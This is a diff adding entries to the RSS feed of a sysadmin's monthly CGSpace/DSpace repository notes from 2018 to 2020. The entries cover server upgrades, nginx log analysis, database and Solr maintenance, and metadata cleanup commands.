+&lt;li&gt;Another &lt;a href=&#34;https://hdl.handle.net/10568/91278&#34;&gt;item&lt;/a&gt; that had the same problem in 2019 has now also linked to the score for its DOI&lt;/li&gt;
+&lt;li&gt;Another &lt;a href=&#34;https://hdl.handle.net/10568/81236&#34;&gt;item&lt;/a&gt; that had the same problem in 2019 has also been fixed&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;/ul&gt;
+&lt;h2 id=&#34;2020-01-07&#34;&gt;2020-01-07&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Peter Ballantyne highlighted one more WLE &lt;a href=&#34;https://hdl.handle.net/10568/101286&#34;&gt;item&lt;/a&gt; that is missing the Altmetric score that its DOI has
+&lt;ul&gt;
+&lt;li&gt;The DOI has a score of 259, but the Handle has no score at all&lt;/li&gt;
+&lt;li&gt;I &lt;a href=&#34;https://twitter.com/mralanorth/status/1214471427157626881&#34;&gt;tweeted&lt;/a&gt; the CGSpace repository link&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>December, 2019</title>
+      <link>https://alanorth.github.io/cgspace-notes/2019-12/</link>
+      <pubDate>Sun, 01 Dec 2019 11:22:30 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2019-12/</guid>
+      <description>&lt;h2 id=&#34;2019-12-01&#34;&gt;2019-12-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Upgrade CGSpace (linode18) to Ubuntu 18.04:
+&lt;ul&gt;
+&lt;li&gt;Check any packages that have residual configs and purge them:&lt;/li&gt;
+&lt;li&gt;&lt;!-- raw HTML omitted --&gt;# dpkg -l | grep -E &amp;lsquo;^rc&amp;rsquo; | awk &amp;lsquo;{print $2}&amp;rsquo; | xargs dpkg -P&lt;!-- raw HTML omitted --&gt;&lt;/li&gt;
+&lt;li&gt;Make sure all packages are up to date and the package manager is up to date, then reboot:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# apt update &amp;amp;&amp;amp; apt full-upgrade
+# apt-get autoremove &amp;amp;&amp;amp; apt-get autoclean
+# dpkg -C
+# reboot
+&lt;/code&gt;&lt;/pre&gt;</description>
+    </item>
+    
+    <item>
+      <title>November, 2019</title>
+      <link>https://alanorth.github.io/cgspace-notes/2019-11/</link>
+      <pubDate>Mon, 04 Nov 2019 12:20:30 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2019-11/</guid>
+      <description>&lt;h2 id=&#34;2019-11-04&#34;&gt;2019-11-04&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Peter noticed that there were 5.2 million hits on CGSpace in 2019-10 according to the Atmire usage statistics
+&lt;ul&gt;
+&lt;li&gt;I looked in the nginx logs and see 4.6 million in the access logs, and 1.2 million in the API logs:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# zcat --force /var/log/nginx/*access.log.*.gz | grep -cE &amp;#34;[0-9]{1,2}/Oct/2019&amp;#34;
+4671942
+# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE &amp;#34;[0-9]{1,2}/Oct/2019&amp;#34;
+1277694
+&lt;/code&gt;&lt;/pre&gt;&lt;ul&gt;
+&lt;li&gt;So 4.6 million from XMLUI and another 1.2 million from API requests&lt;/li&gt;
+&lt;li&gt;Let&amp;rsquo;s see how many of the REST API requests were for bitstreams (because they are counted in Solr stats):&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E &amp;#34;[0-9]{1,2}/Oct/2019&amp;#34;
+1183456 
+# zcat --force /var/log/nginx/rest.log.*.gz | grep -E &amp;#34;[0-9]{1,2}/Oct/2019&amp;#34; | grep -c -E &amp;#34;/rest/bitstreams&amp;#34;
+106781
+&lt;/code&gt;&lt;/pre&gt;</description>
+    </item>
+    
+    <item>
+      <title>October, 2019</title>
+      <link>https://alanorth.github.io/cgspace-notes/2019-10/</link>
+      <pubDate>Tue, 01 Oct 2019 13:20:51 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2019-10/</guid>
+      <description>2019-10-01 Udana from IWMI asked me for a CSV export of their community on CGSpace I exported it, but a quick run through the csv-metadata-quality tool shows that there are some low-hanging fruits we can fix before I send him the data I will limit the scope to the titles, regions, subregions, and river basins for now to manually fix some non-breaking spaces (U+00A0) there that would otherwise be removed by the csv-metadata-quality script&amp;rsquo;s &amp;ldquo;unneccesary Unicode&amp;rdquo; fix: $ csvcut -c &amp;#39;id,dc.</description>
+    </item>
+    
+    <item>
+      <title>September, 2019</title>
+      <link>https://alanorth.github.io/cgspace-notes/2019-09/</link>
+      <pubDate>Sun, 01 Sep 2019 10:17:51 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2019-09/</guid>
+      <description>&lt;h2 id=&#34;2019-09-01&#34;&gt;2019-09-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Linode emailed to say that CGSpace (linode18) had a high rate of outbound traffic for several hours this morning&lt;/li&gt;
+&lt;li&gt;Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &amp;#34;01/Sep/2019:0&amp;#34; | awk &amp;#39;{print $1}&amp;#39; | sort | uniq -c | sort -n | tail -n 10
+    440 17.58.101.255
+    441 157.55.39.101
+    485 207.46.13.43
+    728 169.60.128.125
+    730 207.46.13.108
+    758 157.55.39.9
+    808 66.160.140.179
+    814 207.46.13.212
+   2472 163.172.71.23
+   6092 3.94.211.189
+# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &amp;#34;01/Sep/2019:0&amp;#34; | awk &amp;#39;{print $1}&amp;#39; | sort | uniq -c | sort -n | tail -n 10
+     33 2a01:7e00::f03c:91ff:fe16:fcb
+     57 3.83.192.124
+     57 3.87.77.25
+     57 54.82.1.8
+    822 2a01:9cc0:47:1:1a:4:0:2
+   1223 45.5.184.72
+   1633 172.104.229.92
+   5112 205.186.128.185
+   7249 2a01:7e00::f03c:91ff:fe18:7396
+   9124 45.5.186.2
+&lt;/code&gt;&lt;/pre&gt;</description>
+    </item>
+    
+    <item>
+      <title>August, 2019</title>
+      <link>https://alanorth.github.io/cgspace-notes/2019-08/</link>
+      <pubDate>Sat, 03 Aug 2019 12:39:51 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2019-08/</guid>
+      <description>&lt;h2 id=&#34;2019-08-03&#34;&gt;2019-08-03&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Look at Bioversity&amp;rsquo;s latest migration CSV and now I see that Francesco has cleaned up the extra columns and the newline at the end of the file, but many of the column headers have an extra space in the name&amp;hellip;&lt;/li&gt;
+&lt;/ul&gt;
+&lt;h2 id=&#34;2019-08-04&#34;&gt;2019-08-04&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Deploy ORCID identifier updates requested by Bioversity to CGSpace&lt;/li&gt;
+&lt;li&gt;Run system updates on CGSpace (linode18) and reboot it
+&lt;ul&gt;
+&lt;li&gt;Before updating it I checked Solr and verified that all statistics cores were loaded properly&amp;hellip;&lt;/li&gt;
+&lt;li&gt;After rebooting, all statistics cores were loaded&amp;hellip; wow, that&amp;rsquo;s lucky.&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;Run system updates on DSpace Test (linode19) and reboot it&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>July, 2019</title>
+      <link>https://alanorth.github.io/cgspace-notes/2019-07/</link>
+      <pubDate>Mon, 01 Jul 2019 12:13:51 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2019-07/</guid>
+      <description>&lt;h2 id=&#34;2019-07-01&#34;&gt;2019-07-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Create an &amp;ldquo;AfricaRice books and book chapters&amp;rdquo; collection on CGSpace for AfricaRice&lt;/li&gt;
+&lt;li&gt;Last month Sisay asked why the following &amp;ldquo;most popular&amp;rdquo; statistics link for a range of months in 2018 works for the CIAT community on DSpace Test, but not on CGSpace:
+&lt;ul&gt;
+&lt;li&gt;&lt;a href=&#34;https://dspacetest.cgiar.org/handle/10568/35697/most-popular/item#simplefilter=custom&amp;amp;time_filter_end_date=01%2F12%2F2018&#34;&gt;DSpace Test&lt;/a&gt;&lt;/li&gt;
+&lt;li&gt;&lt;a href=&#34;https://cgspace.cgiar.org/handle/10568/35697/most-popular/item#simplefilter=custom&amp;amp;time_filter_end_date=01%2F12%2F2018&#34;&gt;CGSpace&lt;/a&gt;&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;Abenet had another similar issue a few days ago when trying to find the stats for 2018 in the RTB community&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>June, 2019</title>
+      <link>https://alanorth.github.io/cgspace-notes/2019-06/</link>
+      <pubDate>Sun, 02 Jun 2019 10:57:51 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2019-06/</guid>
+      <description>&lt;h2 id=&#34;2019-06-02&#34;&gt;2019-06-02&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Merge the &lt;a href=&#34;https://github.com/ilri/DSpace/pull/425&#34;&gt;Solr filterCache&lt;/a&gt; and &lt;a href=&#34;https://github.com/ilri/DSpace/pull/426&#34;&gt;XMLUI ISI journal&lt;/a&gt; changes to the &lt;code&gt;5_x-prod&lt;/code&gt; branch and deploy on CGSpace&lt;/li&gt;
+&lt;li&gt;Run system updates on CGSpace (linode18) and reboot it&lt;/li&gt;
+&lt;/ul&gt;
+&lt;h2 id=&#34;2019-06-03&#34;&gt;2019-06-03&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Skype with Marie-Angélique and Abenet about &lt;a href=&#34;https://agriculturalsemantics.github.io/cg-core/cgcore.html&#34;&gt;CG Core v2&lt;/a&gt;&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>May, 2019</title>
+      <link>https://alanorth.github.io/cgspace-notes/2019-05/</link>
+      <pubDate>Wed, 01 May 2019 07:37:43 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2019-05/</guid>
+      <description>&lt;h2 id=&#34;2019-05-01&#34;&gt;2019-05-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Help CCAFS with regenerating some item thumbnails after they uploaded new PDFs to some items on CGSpace&lt;/li&gt;
+&lt;li&gt;A user on the dspace-tech mailing list offered some suggestions for troubleshooting the problem with the inability to delete certain items
+&lt;ul&gt;
+&lt;li&gt;Apparently if the item is in the &lt;code&gt;workflowitem&lt;/code&gt; table it is submitted to a workflow&lt;/li&gt;
+&lt;li&gt;And if it is in the &lt;code&gt;workspaceitem&lt;/code&gt; table it is in the pre-submitted state&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;The item seems to be in a pre-submitted state, so I tried to delete it from there:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;dspace=# DELETE FROM workspaceitem WHERE item_id=74648;
+DELETE 1
+&lt;/code&gt;&lt;/pre&gt;&lt;ul&gt;
+&lt;li&gt;But after this I tried to delete the item from the XMLUI and it is &lt;em&gt;still&lt;/em&gt; present&amp;hellip;&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>April, 2019</title>
+      <link>https://alanorth.github.io/cgspace-notes/2019-04/</link>
+      <pubDate>Mon, 01 Apr 2019 09:00:43 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2019-04/</guid>
+      <description>&lt;h2 id=&#34;2019-04-01&#34;&gt;2019-04-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Meeting with AgroKnow to discuss CGSpace, ILRI data, AReS, GARDIAN, etc
+&lt;ul&gt;
+&lt;li&gt;They asked if we had plans to enable RDF support in CGSpace&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;There have been 4,400 more downloads of the CTA Spore publication from those strange Amazon IP addresses today
+&lt;ul&gt;
+&lt;li&gt;I suspected that some might not be successful, because the stats show less, but today they were all HTTP 200!&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &amp;#39;Spore-192-EN-web.pdf&amp;#39; | grep -E &amp;#39;(18.196.196.108|18.195.78.144|18.195.218.6)&amp;#39; | awk &amp;#39;{print $9}&amp;#39; | sort | uniq -c | sort -n | tail -n 5
+   4432 200
+&lt;/code&gt;&lt;/pre&gt;&lt;ul&gt;
+&lt;li&gt;In the last two weeks there have been 47,000 downloads of this &lt;em&gt;same exact PDF&lt;/em&gt; by these three IP addresses&lt;/li&gt;
+&lt;li&gt;Apply country and region corrections and deletions on DSpace Test and CGSpace:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-9-countries.csv -db dspace -u dspace -p &amp;#39;fuuu&amp;#39; -f cg.coverage.country -m 228 -t ACTION -d
+$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-4-regions.csv -db dspace -u dspace -p &amp;#39;fuuu&amp;#39; -f cg.coverage.region -m 231 -t action -d
+$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-2-countries.csv -db dspace -u dspace -p &amp;#39;fuuu&amp;#39; -m 228 -f cg.coverage.country -d
+$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace -u dspace -p &amp;#39;fuuu&amp;#39; -m 231 -f cg.coverage.region -d
+&lt;/code&gt;&lt;/pre&gt;</description>
+    </item>
+    
+    <item>
+      <title>March, 2019</title>
+      <link>https://alanorth.github.io/cgspace-notes/2019-03/</link>
+      <pubDate>Fri, 01 Mar 2019 12:16:30 +0100</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2019-03/</guid>
+      <description>&lt;h2 id=&#34;2019-03-01&#34;&gt;2019-03-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;I checked IITA&amp;rsquo;s 259 Feb 14 records from last month for duplicates using Atmire&amp;rsquo;s Duplicate Checker on a fresh snapshot of CGSpace on my local machine and everything looks good&lt;/li&gt;
+&lt;li&gt;I am now only waiting to hear from her about where the items should go, though I assume Journal Articles go to IITA Journal Articles collection, etc&amp;hellip;&lt;/li&gt;
+&lt;li&gt;Looking at the other half of Udana&amp;rsquo;s WLE records from 2018-11
+&lt;ul&gt;
+&lt;li&gt;I finished the ones for Restoring Degraded Landscapes (RDL), but these are for Variability, Risks and Competing Uses (VRC)&lt;/li&gt;
+&lt;li&gt;I did the usual cleanups for whitespace, added regions where they made sense for certain countries, cleaned up the DOI link formats, added rights information based on the publications page for a few items&lt;/li&gt;
+&lt;li&gt;Most worryingly, there are encoding errors in the abstracts for eleven items, for example:&lt;/li&gt;
+&lt;li&gt;68.15% � 9.45 instead of 68.15% ± 9.45&lt;/li&gt;
+&lt;li&gt;2003�2013 instead of 2003–2013&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;I think I will need to ask Udana to re-copy and paste the abstracts with more care using Google Docs&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>February, 2019</title>
+      <link>https://alanorth.github.io/cgspace-notes/2019-02/</link>
+      <pubDate>Fri, 01 Feb 2019 21:37:30 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2019-02/</guid>
+      <description>&lt;h2 id=&#34;2019-02-01&#34;&gt;2019-02-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Linode has alerted a few times since last night that the CPU usage on CGSpace (linode18) was high despite me increasing the alert threshold last week from 250% to 275%—I might need to increase it again!&lt;/li&gt;
+&lt;li&gt;The top IPs before, during, and after this latest alert tonight were:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &amp;#34;01/Feb/2019:(17|18|19|20|21)&amp;#34; | awk &amp;#39;{print $1}&amp;#39; | sort | uniq -c | sort -n | tail -n 10
+    245 207.46.13.5
+    332 54.70.40.11
+    385 5.143.231.38
+    405 207.46.13.173
+    405 207.46.13.75
+   1117 66.249.66.219
+   1121 35.237.175.180
+   1546 5.9.6.51
+   2474 45.5.186.2
+   5490 85.25.237.71
+&lt;/code&gt;&lt;/pre&gt;&lt;ul&gt;
+&lt;li&gt;&lt;code&gt;85.25.237.71&lt;/code&gt; is the &amp;ldquo;Linguee Bot&amp;rdquo; that I first saw last month&lt;/li&gt;
+&lt;li&gt;The Solr statistics the past few months have been very high and I was wondering if the web server logs also showed an increase&lt;/li&gt;
+&lt;li&gt;There were just over 3 million accesses in the nginx logs last month:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# time zcat --force /var/log/nginx/* | grep -cE &amp;#34;[0-9]{1,2}/Jan/2019&amp;#34;
+3018243
+
+real    0m19.873s
+user    0m22.203s
+sys     0m1.979s
+&lt;/code&gt;&lt;/pre&gt;</description>
+    </item>
+    
+    <item>
+      <title>January, 2019</title>
+      <link>https://alanorth.github.io/cgspace-notes/2019-01/</link>
+      <pubDate>Wed, 02 Jan 2019 09:48:30 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2019-01/</guid>
+      <description>&lt;h2 id=&#34;2019-01-02&#34;&gt;2019-01-02&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Linode alerted that CGSpace (linode18) had a higher outbound traffic rate than normal early this morning&lt;/li&gt;
+&lt;li&gt;I don&amp;rsquo;t see anything interesting in the web server logs around that time though:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &amp;#34;02/Jan/2019:0(1|2|3)&amp;#34; | awk &amp;#39;{print $1}&amp;#39; | sort | uniq -c | sort -n | tail -n 10
+     92 40.77.167.4
+     99 210.7.29.100
+    120 38.126.157.45
+    177 35.237.175.180
+    177 40.77.167.32
+    216 66.249.75.219
+    225 18.203.76.93
+    261 46.101.86.248
+    357 207.46.13.1
+    903 54.70.40.11
+&lt;/code&gt;&lt;/pre&gt;</description>
+    </item>
+    
+    <item>
+      <title>December, 2018</title>
+      <link>https://alanorth.github.io/cgspace-notes/2018-12/</link>
+      <pubDate>Sun, 02 Dec 2018 02:09:30 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2018-12/</guid>
+      <description>&lt;h2 id=&#34;2018-12-01&#34;&gt;2018-12-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Switch CGSpace (linode18) to use OpenJDK instead of Oracle JDK&lt;/li&gt;
+&lt;li&gt;I manually installed OpenJDK, then removed Oracle JDK, then re-ran the &lt;a href=&#34;http://github.com/ilri/rmg-ansible-public&#34;&gt;Ansible playbook&lt;/a&gt; to update all configuration files, etc&lt;/li&gt;
+&lt;li&gt;Then I ran all system updates and restarted the server&lt;/li&gt;
+&lt;/ul&gt;
+&lt;h2 id=&#34;2018-12-02&#34;&gt;2018-12-02&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;I noticed that there is another issue with PDF thumbnails on CGSpace, and I see there was another &lt;a href=&#34;https://usn.ubuntu.com/3831-1/&#34;&gt;Ghostscript vulnerability last week&lt;/a&gt;&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>November, 2018</title>
+      <link>https://alanorth.github.io/cgspace-notes/2018-11/</link>
+      <pubDate>Thu, 01 Nov 2018 16:41:30 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2018-11/</guid>
+      <description>&lt;h2 id=&#34;2018-11-01&#34;&gt;2018-11-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Finalize AReS Phase I and Phase II ToRs&lt;/li&gt;
+&lt;li&gt;Send a note about my &lt;a href=&#34;https://github.com/ilri/dspace-statistics-api&#34;&gt;dspace-statistics-api&lt;/a&gt; to the dspace-tech mailing list&lt;/li&gt;
+&lt;/ul&gt;
+&lt;h2 id=&#34;2018-11-03&#34;&gt;2018-11-03&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Linode has been sending mails a few times a day recently that CGSpace (linode18) has had high CPU usage&lt;/li&gt;
+&lt;li&gt;Today these are the top 10 IPs:&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>October, 2018</title>
+      <link>https://alanorth.github.io/cgspace-notes/2018-10/</link>
+      <pubDate>Mon, 01 Oct 2018 22:31:54 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2018-10/</guid>
+      <description>&lt;h2 id=&#34;2018-10-01&#34;&gt;2018-10-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Phil Thornton got an ORCID identifier so we need to add it to the list on CGSpace and tag his existing items&lt;/li&gt;
+&lt;li&gt;I created a GitHub issue to track this &lt;a href=&#34;https://github.com/ilri/DSpace/issues/389&#34;&gt;#389&lt;/a&gt;, because I&amp;rsquo;m super busy in Nairobi right now&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>September, 2018</title>
+      <link>https://alanorth.github.io/cgspace-notes/2018-09/</link>
+      <pubDate>Sun, 02 Sep 2018 09:55:54 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2018-09/</guid>
+      <description>&lt;h2 id=&#34;2018-09-02&#34;&gt;2018-09-02&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;New &lt;a href=&#34;https://jdbc.postgresql.org/documentation/changelog.html#version_42.2.5&#34;&gt;PostgreSQL JDBC driver version 42.2.5&lt;/a&gt;&lt;/li&gt;
+&lt;li&gt;I&amp;rsquo;ll update the DSpace role in our &lt;a href=&#34;https://github.com/ilri/rmg-ansible-public&#34;&gt;Ansible infrastructure playbooks&lt;/a&gt; and run the updated playbooks on CGSpace and DSpace Test&lt;/li&gt;
+&lt;li&gt;Also, I&amp;rsquo;ll re-run the &lt;code&gt;postgresql&lt;/code&gt; tasks because the custom PostgreSQL variables are dynamic according to the system&amp;rsquo;s RAM, and we never re-ran them after migrating to larger Linodes last month&lt;/li&gt;
+&lt;li&gt;I&amp;rsquo;m testing the new DSpace 5.8 branch in my Ubuntu 18.04 environment and I&amp;rsquo;m getting those autowire errors in Tomcat 8.5.30 again:&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>August, 2018</title>
+      <link>https://alanorth.github.io/cgspace-notes/2018-08/</link>
+      <pubDate>Wed, 01 Aug 2018 11:52:54 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2018-08/</guid>
+      <description>&lt;h2 id=&#34;2018-08-01&#34;&gt;2018-08-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;DSpace Test had crashed at some point yesterday morning and I see the following in &lt;code&gt;dmesg&lt;/code&gt;:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[Tue Jul 31 00:00:41 2018] Out of memory: Kill process 1394 (java) score 668 or sacrifice child
+[Tue Jul 31 00:00:41 2018] Killed process 1394 (java) total-vm:15601860kB, anon-rss:5355528kB, file-rss:0kB, shmem-rss:0kB
+[Tue Jul 31 00:00:41 2018] oom_reaper: reaped process 1394 (java), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB
+&lt;/code&gt;&lt;/pre&gt;&lt;ul&gt;
+&lt;li&gt;Judging from the time of the crash it was probably related to the Discovery indexing that starts at midnight&lt;/li&gt;
+&lt;li&gt;From the DSpace log I see that eventually Solr stopped responding, so I guess the &lt;code&gt;java&lt;/code&gt; process that was OOM killed above was Tomcat&amp;rsquo;s&lt;/li&gt;
+&lt;li&gt;I&amp;rsquo;m not sure why Tomcat didn&amp;rsquo;t crash with an OutOfMemoryError&amp;hellip;&lt;/li&gt;
+&lt;li&gt;Anyways, perhaps I should increase the JVM heap from 5120m to 6144m like we did a few months ago when we tried to run the whole CGSpace Solr core&lt;/li&gt;
+&lt;li&gt;The server only has 8GB of RAM so we&amp;rsquo;ll eventually need to upgrade to a larger one because we&amp;rsquo;ll start starving the OS, PostgreSQL, and command line batch processes&lt;/li&gt;
+&lt;li&gt;I ran all system updates on DSpace Test and rebooted it&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>July, 2018</title>
+      <link>https://alanorth.github.io/cgspace-notes/2018-07/</link>
+      <pubDate>Sun, 01 Jul 2018 12:56:54 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2018-07/</guid>
+      <description>&lt;h2 id=&#34;2018-07-01&#34;&gt;2018-07-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;I want to upgrade DSpace Test to DSpace 5.8 so I took a backup of its current database just in case:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;$ pg_dump -b -v -o --format=custom -U dspace -f dspace-2018-07-01.backup dspace
+&lt;/code&gt;&lt;/pre&gt;&lt;ul&gt;
+&lt;li&gt;During the &lt;code&gt;mvn package&lt;/code&gt; stage on the 5.8 branch I kept getting issues with java running out of memory:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;There is insufficient memory for the Java Runtime Environment to continue.
+&lt;/code&gt;&lt;/pre&gt;</description>
+    </item>
+    
+    <item>
+      <title>June, 2018</title>
+      <link>https://alanorth.github.io/cgspace-notes/2018-06/</link>
+      <pubDate>Mon, 04 Jun 2018 19:49:54 -0700</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2018-06/</guid>
+      <description>&lt;h2 id=&#34;2018-06-04&#34;&gt;2018-06-04&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Test the &lt;a href=&#34;https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=560&#34;&gt;DSpace 5.8 module upgrades from Atmire&lt;/a&gt; (&lt;a href=&#34;https://github.com/ilri/DSpace/pull/378&#34;&gt;#378&lt;/a&gt;)
+&lt;ul&gt;
+&lt;li&gt;There seems to be a problem with the CUA and L&amp;amp;R versions in &lt;code&gt;pom.xml&lt;/code&gt; because they are using SNAPSHOT and it doesn&amp;rsquo;t build&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;I added the new CCAFS Phase II Project Tag &lt;code&gt;PII-FP1_PACCA2&lt;/code&gt; and merged it into the &lt;code&gt;5_x-prod&lt;/code&gt; branch (&lt;a href=&#34;https://github.com/ilri/DSpace/pull/379&#34;&gt;#379&lt;/a&gt;)&lt;/li&gt;
+&lt;li&gt;I proofed and tested the ILRI author corrections that Peter sent back to me this week:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;$ ./fix-metadata-values.py -i /tmp/2018-05-30-Correct-660-authors.csv -db dspace -u dspace -p &amp;#39;fuuu&amp;#39; -f dc.contributor.author -t correct -m 3 -n
+&lt;/code&gt;&lt;/pre&gt;&lt;ul&gt;
+&lt;li&gt;I think a sane proofing workflow in OpenRefine is to apply the custom text facets for check/delete/remove and illegal characters that I developed in &lt;a href=&#34;https://alanorth.github.io/cgspace-notes/cgspace-notes/2018-03/&#34;&gt;March, 2018&lt;/a&gt;&lt;/li&gt;
+&lt;li&gt;Time to index ~70,000 items on CGSpace:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;$ time schedtool -D -e ionice -c2 -n7 nice -n19 [dspace]/bin/dspace index-discovery -b                                  
+
+real    74m42.646s
+user    8m5.056s
+sys     2m7.289s
+&lt;/code&gt;&lt;/pre&gt;</description>
+    </item>
+    
+    <item>
+      <title>May, 2018</title>
+      <link>https://alanorth.github.io/cgspace-notes/2018-05/</link>
+      <pubDate>Tue, 01 May 2018 16:43:54 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2018-05/</guid>
+      <description>&lt;h2 id=&#34;2018-05-01&#34;&gt;2018-05-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;I cleared the Solr statistics core on DSpace Test by issuing two commands directly to the Solr admin interface:
+&lt;ul&gt;
+&lt;li&gt;http://localhost:3000/solr/statistics/update?stream.body=%3Cdelete%3E%3Cquery%3E*:*%3C/query%3E%3C/delete%3E&lt;/li&gt;
